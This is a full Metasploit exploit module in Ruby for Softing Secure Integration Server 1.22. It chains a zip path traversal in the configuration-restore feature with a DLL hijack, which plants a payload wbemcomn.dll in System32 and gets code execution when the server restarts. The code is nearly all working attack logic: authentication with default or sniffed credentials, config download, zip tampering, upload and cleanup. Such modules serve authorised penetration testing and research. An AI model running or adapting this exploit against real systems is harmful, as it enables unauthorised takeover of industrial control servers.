Softing Secure Integration Server 1.22 Remote Code Execution

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'zip'  
require 'metasploit/framework/login_scanner/softing_sis'  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::EXE  
include Msf::Exploit::FileDropper  
include Msf::Exploit::Remote::HttpClient  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Softing Secure Integration Server v1.22 Remote Code Execution',  
'Description' => %q{  
This module chains two vulnerabilities (CVE-2022-1373 and CVE-2022-2334) to achieve authenticated remote code execution against Softing Secure Integration Server v1.22.  
  
In CVE-2022-1373, the restore configuration feature is vulnerable to a directory traversal vulnerablity when processing zip files. When using the "restore configuration" feature to upload a zip file containing a path traversal file which is a dll called ..\..\..\..\..\..\..\..\..\..\..\Windows\System32\wbem\wbemcomn.dll. This causes the file C:\Windows\System32\wbem\wbemcomn.dll to be created and executed upon touching the disk.  
  
In CVE-2022-2334, the planted wbemcomn.dll is used in a DLL hijacking attack when Softing Secure Integration Server restarts upon restoring configuration, which allows us to execute arbitrary code on the target system.  
  
The chain demonstrated in Pwn2Own used a signature instead of a password. The signature was acquired by running an ARP spoofing attack against the local network where the Softing SIS server was located. A username is also required for signature authentication.  
  
A custom DLL can be provided to use in the exploit instead of using the default MSF-generated one. Refer to the module documentation for more details.  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'Chris Anastasio (muffin) of Incite Team', # discovery  
'Steven Seeley (mr_me) of Incite Team', # discovery  
'Imran E. Dawoodjee <imrandawoodjee.infosec[at]gmail.com>', # msf module  
],  
'References' => [  
['CVE', '2022-1373'],  
['CVE', '2022-2334'],  
['ZDI', '22-1154'],  
['ZDI', '22-1156'],  
['URL', 'https://industrial.softing.com/fileadmin/psirt/downloads/syt-2022-5.html'],  
['URL', 'https://ide0x90.github.io/softing-sis-122-rce/']  
],  
'DefaultOptions' => {  
'RPORT' => 8099,  
'SSL' => false,  
'EXITFUNC' => 'thread',  
'WfsDelay' => 300  
},  
'Platform' => 'win',  
# the software itself only supports x64, see  
# https://industrial.softing.com/products/opc-opc-ua-software-platform/integration-platform/secure-integration-server.html  
'Arch' => [ARCH_X64],  
'Targets' => [  
[ 'Windows x64', { 'Arch' => ARCH_X64 } ]  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => '2022-07-27',  
'Privileged' => true,  
'Compat' => {  
'Meterpreter' => {  
'Commands' => %w[  
stdapi_fs_delete_file  
]  
}  
},  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]  
}  
)  
)  
  
register_options(  
[  
OptString.new('SIGNATURE', [false, 'Use a username/signature pair instead of username/password pair to authenticate']),  
OptString.new('USERNAME', [false, 'The username to specify for authentication.', 'admin']),  
OptString.new('PASSWORD', [false, 'The password to specify for authentication', 'admin']),  
OptString.new('DLLPATH', [false, 'Custom compiled DLL to use'])  
]  
)  
  
self.needs_cleanup = true  
end  
  
# this will be updated with the signature from "check"  
@signature = nil  
  
# create a checker instance to reuse code from the Softing SIS login bruteforce module  
def checker_instance  
Metasploit::Framework::LoginScanner::SoftingSIS.new(  
configure_http_login_scanner(  
host: datastore['RHOSTS'],  
port: datastore['RPORT'],  
connection_timeout: 5  
)  
).dup  
end  
  
# check if the generated/provided signature is valid for the specified user  
def signature_check(user, signature)  
send_request_cgi({  
'method' => 'GET',  
'uri' => "/runtime/core/user/#{user}/authentication",  
'vars_get' => {  
'User' => user,  
'Signature' => signature  
}  
})  
end  
  
def check  
# check the Softing SIS version  
softing_version_res = checker_instance.check_setup  
unless softing_version_res  
return CheckCode::Unknown  
end  
  
softing_version = Rex::Version.new(softing_version_res)  
print_status("#{peer} - Found Softing Secure Integration Server #{softing_version}")  
  
# the vulnerabilities are to be fixed in version 1.30 according to the Softing advisory  
# so we will not continue if the version is not vulnerable  
unless softing_version < Rex::Version.new('1.30')  
return CheckCode::Safe  
end  
  
# if the operator provides a signature, then use that instead of the username and password  
if datastore['SIGNATURE']  
print_status("#{peer} - Authenticating as user #{datastore['USERNAME']} with signature #{datastore['SIGNATURE']}...")  
# send a GET request to /runtime/core/user/<username>/authentication  
signature_check_res = signature_check(datastore['USERNAME'], datastore['SIGNATURE'])  
  
# if we cannot connect at this point, we only know that the version is < 1.30  
# the system "appears" to be vulnerable  
unless signature_check_res  
print_error("#{peer} - Connection failed!")  
end  
  
# if the signature is correct, 200 OK is returned  
if signature_check_res.code == 200  
print_good("#{peer} - Signature #{datastore['SIGNATURE']} is valid for user #{datastore['USERNAME']}")  
@signature = datastore['SIGNATURE']  
else  
print_error("#{peer} - Signature #{datastore['SIGNATURE']} is invalid for user #{datastore['USERNAME']}!")  
end  
# login with username and password  
else  
# get the authentication token  
auth_token = checker_instance.get_auth_token(datastore['USERNAME'])  
# generate the signature  
@signature = checker_instance.generate_signature(auth_token[:proof], datastore['USERNAME'], datastore['PASSWORD'])  
# check the generated signatures' validity  
signature_check_res = signature_check(datastore['USERNAME'], @signature)  
# if we cannot connect, then the system "appears" to be vulnerable  
unless signature_check_res  
print_error("#{peer} - Connection failed!")  
end  
  
# if the signature is correct, 200 OK is returned  
if signature_check_res.code == 200  
print_good("#{peer} - Valid credentials provided")  
else  
print_error("#{peer} - Invalid credentials!")  
end  
end  
  
# if the version is less than 1.30 it's supposedly vulnerable  
# but there is no way to confirm vulnerability existence without actually exploiting  
# so instead of "Vulnerable", return "Appears"  
CheckCode::Appears  
end  
  
def exploit  
# did the operator specify a custom DLL? If not...  
if datastore['DLLPATH']  
# otherwise, just use their provided DLL and assume they compiled everything correctly  
# there is no way to check if it's compiled correctly anyway  
dll_path = datastore['DLLPATH']  
else  
# have MSF create the malicious DLL  
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-2334')  
datastore['EXE::Path'] = path  
datastore['EXE::Template'] = ::File.join(path, 'template_x64_windows.dll')  
  
print_status('Generating payload DLL...')  
dll = generate_payload_dll  
dll_name = 'wbemcomn.dll'  
dll_path = store_file(dll, dll_name)  
print_status("Created #{dll_path}")  
end  
  
# backup the Softing SIS configuration  
print_status("#{peer} - Saving configuration...")  
get_config_zip_res = send_request_cgi({  
'method' => 'GET',  
'uri' => '/runtime/core/config-download',  
'vars_get' => {  
'User' => datastore['USERNAME'],  
'Signature' => @signature  
}  
})  
  
# end if we cannot get the configuration for some reason  
unless get_config_zip_res  
fail_with Failure::Unreachable, "#{peer} - Could not obtain configuration"  
end  
  
# status code 200 is the expected response to getting the configuration ZIP  
unless get_config_zip_res.code == 200  
# for verbosity, save the JSON response  
get_config_zip_res_json = get_config_zip_res.get_json_document  
vprint_error("#{peer} - #{get_config_zip_res_json}")  
fail_with Failure::UnexpectedReply, "#{peer} - Returned code #{get_config_zip_res.code}, could not obtain configuration"  
end  
  
# if successful, the body cnotains the configuration ZIP  
config_zip = get_config_zip_res.body  
  
# config_download.zip is the name of the configuration ZIP when downloading from the browser  
# append a hash based on the peer address to prevent overwriting the config file if there are multiple targets  
config_zip_name = "config_download_#{Digest::MD5.hexdigest(peer)}.zip"  
  
# store the config zip file  
config_zip_path = store_file(config_zip, config_zip_name)  
print_status("Saved configuration to #{config_zip_path}")  
  
# insert the malicious DLL  
Zip::File.open(config_zip_path, Zip::File::CREATE) do |zipfile|  
zipfile.add('..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\wbem\\wbemcomn.dll', dll_path)  
end  
  
# restore the configuration  
restore_config_res = send_request_cgi({  
'method' => 'PUT',  
'uri' => '/runtime/core/config-restore',  
'cookie' => "systemLang=en-US; lang=en; User=#{datastore['USERNAME']}; Signature=#{@signature}",  
'vars_get' => {  
'User' => datastore['USERNAME'],  
'Signature' => @signature  
},  
'data' => File.read(config_zip_path)  
})  
  
# no response  
unless restore_config_res  
fail_with Failure::Unreachable, "#{peer} - Could not restore configuration!"  
end  
  
# bad response  
unless restore_config_res.code == 200  
# for verbosity, show the JSON response  
restore_config_res_json = restore_config_res.get_json_document  
vprint_error("#{peer} - #{restore_config_res_json}")  
fail_with Failure::UnexpectedReply, "#{peer} - Returned code #{restore_config_res.code}, could not restore configuration!"  
end  
end  
  
# clean up the planted DLL if the session is meterpreter  
def on_new_session(session)  
super  
  
unless file_dropper_delete_file(session, 'C:\\Windows\\System32\\wbem\\wbemcomn.dll')  
# if the exploit was successful, register the malicious wbemcomn.dll file for cleanup  
register_file_for_cleanup('C:\\Windows\\System32\\wbem\\wbemcomn.dll')  
end  
end  
  
# Store the file in the MSF local directory (/root/.msf4/local/) so it can be used when creating the ZIP file  
# literal copypasta from exploits/windows/fileformat/cve_2017_8464_lnk_rce  
def store_file(data, filename)  
if !::File.directory?(Msf::Config.local_directory)  
FileUtils.mkdir_p(Msf::Config.local_directory)  
end  
  
if filename && !filename.empty?  
fname, ext = filename.split('.')  
else  
fname = "local_#{Time.now.utc.to_i}"  
end  
  
fname = ::File.split(fname).last  
  
fname.gsub!(/[^a-z0-9._-]+/i, '')  
fname << ".#{ext}"  
  
path = File.join("#{Msf::Config.local_directory}/", fname)  
full_path = ::File.expand_path(path)  
File.open(full_path, 'wb') { |fd| fd.write(data) }  
  
full_path.dup  
end  
end  
`